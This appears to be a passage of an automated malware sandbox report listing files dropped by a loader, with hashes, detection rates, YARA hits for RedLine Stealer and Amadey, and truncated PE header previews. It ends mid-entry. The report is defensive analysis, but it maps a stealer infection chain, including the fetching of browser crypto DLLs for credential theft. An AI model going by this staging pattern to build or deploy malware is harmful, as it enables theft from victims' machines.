Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1822720
Entropy (8bit):	7.951300475373252
Encrypted:	false
SSDEEP:	49152:5X0aKtI+mD9Mndc9wZ54vQyo7V6OQgDsn8pSk5e:5XEI1DSdJqIQOQepl
MD5:	A80A86C701801CBD77CF7406BE6D11F0
SHA1:	EF98A953FAE4506E0402DE15C1F1D9F0BFB47B01
SHA-256:	2F25790B3368B6AFD35007DFE873E90A288CFCE9D19758756B71FA6952A675F2
SHA-512:	7E1216BDA5C36EFCC4146C410CB5717E0E9E8257C25CEF2239D631FA6FB15EC953B5155B6C4B4F4F3FF661425D1B6E5B716C21711FC7DDD423E6FC009E363D97
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.@.@.....Q...........V..s..R.....G.@....s.....s..X..p..A..p..A.Rich@.................PE..L...1.{f...............'....................0....@.......................... ............@.....................................P...............................(!.....................................@............0..x............................text............................... ..`.BsS....m.... ...................... ..`.rdata..z....0......................@..@.data...............................@....reloc..(!......."..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\gold[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	505344
Entropy (8bit):	7.634281222575631
Encrypted:	false
SSDEEP:	12288:AxJVyE3e2Uo4a3Tq7c85n93zxAdiFZ3wWxc:An93aOMn5n9DxOiFZ3T
MD5:	92C01627961859A84FFA633327C5D7F9
SHA1:	5B406C39F81F67E2B2E263137C7059718E4AF007
SHA-256:	92373C134CBF9FC4A98ED7C80F244C8655B3852D3A1F1983FC4A7B3A00BF1370
SHA-512:	F31F9D45D7783441866FAA0E684412040DD74C2878ADFC6E5A874626E291B3E3CAE7746CB62E2388D4183E615D9B919178FA409F2E12B3D0CF478C59450D3439
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ODM..........\).....\/.k...\.............\+......+.E..../......)....1./....1.(....Rich...........................PE..L....yf...............'....................0....@.......................................@.....................................d...............................(!.....................................@............0...............................text............................... ..`.BSs......... ...................... ..`.rdata.......0......................@..@.data...............................@....reloc..(!......."..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\Installer[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158208
Entropy (8bit):	6.79366712379007
Encrypted:	false
SSDEEP:	3072:EahKyd2n3155GWp1icKAArDZz4N9GhbkrNEk1tYT:EahOVp0yN90QE8E
MD5:	5F331887BEC34F51CCA7EA78815621F7
SHA1:	2EB81490DD3A74ACA55E45495FA162B31BCB79E7
SHA-256:	D7AB2F309EE99F6545C9E1D86166740047965DD8172AEC5F0038753C9FF5E9D8
SHA-512:	7A66C5D043139A3B20814AC65110F8151CF652E3F9D959489781FDAEA33E9F53CE9FD1992F1A32BFF73380C7D9EF47200D8B924A8ADF415E7A93421D62EB054D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|.....................@....................................s.....`.......... ......................................<...........(....................... .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............h..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcf-to-csv-converter[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5898240
Entropy (8bit):	6.593254351638262
Encrypted:	false
SSDEEP:	49152:uOSBrypr/j6bvhEJNDZMMMZc/cftjn1zAkbQNDFG6jO5E90QS/NkW+cD3wxv+vps:RqrD8NN//un1ckEsU5Xi1S
MD5:	9B297A1485665AEF1A926F7CD322C932
SHA1:	7C053B8F3905244558D2C319094EF09985521864
SHA-256:	8C75F8E94486F5BBF461505823F5779F328C5B37F1387C18791E0C21F3FDD576
SHA-512:	2A59BB8D940B9BC73EA112AEBD04B3B461924ADC29F47EA774BD1DE23B638C283A041B202693A184D68EC920F2F56160CFDED3B17AFAE31EE46FD00886D9F61B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$......Y................@.............................@`......bZ...`... .......................................\.N.....\...... ]..b...0V..............._.<...........................`.V.(...................\|.\.@............................text...............................`.``.data...............................@.`..rdata....1..@$...1..*$.............@.`@.pdata.......0V.......V.............@.0@.xdata..D.....V.......V.............@.0@.bss....`.....W.......................`..edata..N.....\.......V.............@.0@.idata........\.......V.............@.0..CRT....p.....].......V.............@.@..tls..........].......V.............@.@..rsrc....b... ]..d....V.............@.0..reloc..<....._......TY.............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	5.029850019387454
Encrypted:	false
SSDEEP:	3072:xqFFrqwIOGBHy9MGSwTc425F7dw4AhTiNhdSCTZifjIxcZqf7D34leqiOLCbBOu:QBIOGf4259dnTZcscZqf7DIvL
MD5:	CD581D68ED550455444EE6E099C44266
SHA1:	F131D587578336651FD3E325B82B6C185A4B6429
SHA-256:	A2EBB4BBF2AE4F7755B3AB604996E6C7E570AC8837CA544854ED696A81972505
SHA-512:	33F94920032436CD45906C27CD5B39F47F9519AB5A1A6745BD8A69D81CE729D8E5E425A7538B5F4F6992BD3804E0376085F5DA1C28CF9F4D664CABE64036D0B5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0................. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.516408105291076
Encrypted:	false
SSDEEP:	12288:5fSPtGpmLb84Jjzo6yrBuKuJ+ITOC0Ud:UtGpmf8edykhV0Ud
MD5:	07101CAC5B9477BA636CD8CA7B9932CB
SHA1:	59EA7FD9AE6DED8C1B7240A4BF9399B4EB3849F1
SHA-256:	488385CD54D14790B03FA7C7DC997EBEA3F7B2A8499E5927EB437A3791102A77
SHA-512:	02240FF51A74966BC31CFCC901105096EB871F588EFAA9BE1A829B4EE6F245BD9DCA37BE7E2946BA6315FEEA75C3DCE5F490847250E62081445CD25B0F406887
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...).nf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1000020001\1.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	324608
Entropy (8bit):	5.477406626373578
Encrypted:	false
SSDEEP:	3072:uuRL5Z0OG4ZT2jqCXr+9P9TlHp5Sn5ma9l2MyM8MITIk:7L/0ZkT22e6FTlHTShgMBk
MD5:	E1B59D2805B38262B9967BCE3E719DBF
SHA1:	4081416CFAA76941981C34518D45B60E8D4B2013
SHA-256:	D5BBA713D11EBBB7A91BE59DAE0F2D4B818897FE756B854DFE40BABE7664C173
SHA-512:	BCEA30A8F2A10AED0E2C97133734A34A850C18EE9447966ED8CDAE8BBF72B98EBD2703A7CADF53B8991EF5EB3047D871242E990A4B7BAF00EDA8CA5F5F7DDA35
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.7...YE..YE..YE...E*.YE...E..YE...Ez.YE/n"E..YE..XEx.YE...E..YE...E..YE...E..YERich..YE................PE..L....\Qd..........................................@.................................62......................................l...x.......h............................................................................................................text............................... ..`.rdata..............................@..@.data............b..................@....rsrc...h...........................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000035001\gold.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	505344
Entropy (8bit):	7.634281222575631
Encrypted:	false
SSDEEP:	12288:AxJVyE3e2Uo4a3Tq7c85n93zxAdiFZ3wWxc:An93aOMn5n9DxOiFZ3T
MD5:	92C01627961859A84FFA633327C5D7F9
SHA1:	5B406C39F81F67E2B2E263137C7059718E4AF007
SHA-256:	92373C134CBF9FC4A98ED7C80F244C8655B3852D3A1F1983FC4A7B3A00BF1370
SHA-512:	F31F9D45D7783441866FAA0E684412040DD74C2878ADFC6E5A874626E291B3E3CAE7746CB62E2388D4183E615D9B919178FA409F2E12B3D0CF478C59450D3439
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ODM..........\).....\/.k...\.............\+......+.E..../......)....1./....1.(....Rich...........................PE..L....yf...............'....................0....@.......................................@.....................................d...............................(!.....................................@............0...............................text............................... ..`.BSs......... ...................... ..`.rdata.......0......................@..@.data...............................@....reloc..(!......."..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.516408105291076
Encrypted:	false
SSDEEP:	12288:5fSPtGpmLb84Jjzo6yrBuKuJ+ITOC0Ud:UtGpmf8edykhV0Ud
MD5:	07101CAC5B9477BA636CD8CA7B9932CB
SHA1:	59EA7FD9AE6DED8C1B7240A4BF9399B4EB3849F1
SHA-256:	488385CD54D14790B03FA7C7DC997EBEA3F7B2A8499E5927EB437A3791102A77
SHA-512:	02240FF51A74966BC31CFCC901105096EB871F588EFAA9BE1A829B4EE6F245BD9DCA37BE7E2946BA6315FEEA75C3DCE5F490847250E62081445CD25B0F406887
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...).nf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158208
Entropy (8bit):	6.79366712379007
Encrypted:	false
SSDEEP:	3072:EahKyd2n3155GWp1icKAArDZz4N9GhbkrNEk1tYT:EahOVp0yN90QE8E
MD5:	5F331887BEC34F51CCA7EA78815621F7
SHA1:	2EB81490DD3A74ACA55E45495FA162B31BCB79E7
SHA-256:	D7AB2F309EE99F6545C9E1D86166740047965DD8172AEC5F0038753C9FF5E9D8
SHA-512:	7A66C5D043139A3B20814AC65110F8151CF652E3F9D959489781FDAEA33E9F53CE9FD1992F1A32BFF73380C7D9EF47200D8B924A8ADF415E7A93421D62EB054D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6..7...6..7...6..7...6..7...6...6...6..7...6..o6...6..7...6Rich...6................PE..d................."......\|.....................@....................................s.....`.......... ......................................<...........(....................... .......T...........................................(... ............................text....{.......\|.................. ..`.rdata...".......$..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc.. ............h..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.51614449175576
Encrypted:	false
SSDEEP:	12288:pfSPtGpmLb84Jjzo6yrBuKuJ+ITOClUd:ktGpmf8edykhVlUd
MD5:	C4AEAAFC0507785736E000FF7E823F5E
SHA1:	B1ACDEE835F02856985A822FE99921B097ED1519
SHA-256:	B1D5B1E480A5731CAACC65609EAF069622F1129965819079AA09BC9D96DADDE5
SHA-512:	FBAEFBCE3232481490BCE7B859C6C1BAFD87EE6D952A2BE9BF7C4ED25FE8FC9AFF46C2246E247AA05CE8E405831A5905CA366C5333EDE0AF48F9A6287479A12D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....rf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000109001\alex5555555.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1822720
Entropy (8bit):	7.951300475373252
Encrypted:	false
SSDEEP:	49152:5X0aKtI+mD9Mndc9wZ54vQyo7V6OQgDsn8pSk5e:5XEI1DSdJqIQOQepl
MD5:	A80A86C701801CBD77CF7406BE6D11F0
SHA1:	EF98A953FAE4506E0402DE15C1F1D9F0BFB47B01
SHA-256:	2F25790B3368B6AFD35007DFE873E90A288CFCE9D19758756B71FA6952A675F2
SHA-512:	7E1216BDA5C36EFCC4146C410CB5717E0E9E8257C25CEF2239D631FA6FB15EC953B5155B6C4B4F4F3FF661425D1B6E5B716C21711FC7DDD423E6FC009E363D97
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 63%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.@.@.....Q...........V..s..R.....G.@....s.....s..X..p..A..p..A.Rich@.................PE..L...1.{f...............'....................0....@.......................... ............@.....................................P...............................(!.....................................@............0..x............................text............................... ..`.BsS....m.... ...................... ..`.rdata..z....0......................@..@.data...............................@....reloc..(!......."..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000110001\123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	304128
Entropy (8bit):	5.029850019387454
Encrypted:	false
SSDEEP:	3072:xqFFrqwIOGBHy9MGSwTc425F7dw4AhTiNhdSCTZifjIxcZqf7D34leqiOLCbBOu:QBIOGf4259dnTZcscZqf7DIvL
MD5:	CD581D68ED550455444EE6E099C44266
SHA1:	F131D587578336651FD3E325B82B6C185A4B6429
SHA-256:	A2EBB4BBF2AE4F7755B3AB604996E6C7E570AC8837CA544854ED696A81972505
SHA-512:	33F94920032436CD45906C27CD5B39F47F9519AB5A1A6745BD8A69D81CE729D8E5E425A7538B5F4F6992BD3804E0376085F5DA1C28CF9F4D664CABE64036D0B5
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000110001\123.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 68%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0................. ........@.. ....................................@.................................x...O...................................\................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5898240
Entropy (8bit):	6.593254351638262
Encrypted:	false
SSDEEP:	49152:uOSBrypr/j6bvhEJNDZMMMZc/cftjn1zAkbQNDFG6jO5E90QS/NkW+cD3wxv+vps:RqrD8NN//un1ckEsU5Xi1S
MD5:	9B297A1485665AEF1A926F7CD322C932
SHA1:	7C053B8F3905244558D2C319094EF09985521864
SHA-256:	8C75F8E94486F5BBF461505823F5779F328C5B37F1387C18791E0C21F3FDD576
SHA-512:	2A59BB8D940B9BC73EA112AEBD04B3B461924ADC29F47EA774BD1DE23B638C283A041B202693A184D68EC920F2F56160CFDED3B17AFAE31EE46FD00886D9F61B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$......Y................@.............................@`......bZ...`... .......................................\.N.....\...... ]..b...0V..............._.<...........................`.V.(...................\|.\.@............................text...............................`.``.data...............................@.`..rdata....1..@$...1..*$.............@.`@.pdata.......0V.......V.............@.0@.xdata..D.....V.......V.............@.0@.bss....`.....W.......................`..edata..N.....\.......V.............@.0@.idata........\.......V.............@.0..CRT....p.....].......V.............@.@..tls..........].......V.............@.@..rsrc....b... ]..d....V.............@.0..reloc..<....._......TY.............@.0B................................................................................................................................

C:\Users\user\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	7.788501679241677
Encrypted:	false
